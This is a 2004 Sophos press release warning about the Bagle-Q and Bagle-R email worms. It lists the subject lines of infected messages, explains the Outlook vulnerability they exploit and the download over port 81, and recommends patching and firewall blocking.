Sophos warns of new twist in Bagle threat, as new variants emerge

March 18, 2004 Sophos Press Release

Sophos, a world leader in protecting businesses against viruses and spam, is warning of a new twist in the Bagle virus saga. Two new variants, W32/Bagle-Q and W32/Bagle-R, use a different method of infection in an attempt to bypass anti-virus protection at the email gateway.

Unlike most email viruses, the two new Bagle worms do not carry email attachments, making them difficult to spot. Infected messages have a random subject line chosen from the following list:

Re: Msg reply
Re: Hello
Re: Yahoo!
Re: Thank you!
Re: Thanks :)
RE: Text message
Re: Document
Incoming message
Re: Incoming Message
Re: Incoming Fax
Hidden message
Fax Message Received
Protected message
RE: Protected message
Forum notify
Request response
Site changes
Re: Hi
Encrypted document

If a user opens the message - and their version of Microsoft Outlook has not been patched against a five-month old critical vulnerability - malicious code is automatically downloaded.

Once installed, the worms halt a wide range of security applications, potentially opening up your computer to further virus or hacker attack. The worm will also attempt to spread via file-sharing networks and infect other executable files.

"All computer users should be wary of this worm - we've already had reports from some parts of the world - particularly Korea, which is known for its uptake and use of technology," said Graham Cluley, senior technology consultant at Sophos. "Exploiting a security loophole in the popular Microsoft Outlook email system means these worms have the potential to hit hard. Both home and business computer users need to make sure they are patched against all vulnerabilities."

To prevent infection, Sophos recommends that users update their anti-virus software against the latest threats. Users should also patch against all security vulnerabilities.

Businesses can also protect themselves at their firewall, preventing computers on their network from downloading the worm from outside.

"Bagle is a wake up call about the need for holistic security. By keeping on top of security patches, anti-virus software updates and ensuring firewalls are properly installed, users can lessen their chances of getting hit," continued Cluley. "If you don't patch yourself against these kind of threats, you shouldn't be surprised if a worm bites you on the backside".

The patch against the Microsoft Outlook security vulnerability can be found at www.microsoft.com/technet/security/bulletin/MS03-040.mspx. Home users of Microsoft Windows can visit windowsupdate.microsoft.com to have their systems scanned for Microsoft security vulnerabilities.

Sophos recommends the following precautions against the W32/Bagle-Q and W32/Bagle-R worms:

  • Get and apply the latest Internet Explorer/Outlook Express patches from Microsoft. This prevents the automatic download of the virus.
  • Disallow connections to TCP port 81 through your network firewall. Blocking outbound port 81 connections stops computers on your network from downloading the worm from outside. Blocking inbound port 81 connections means that even if you do get infected you will not pass the virus on to others.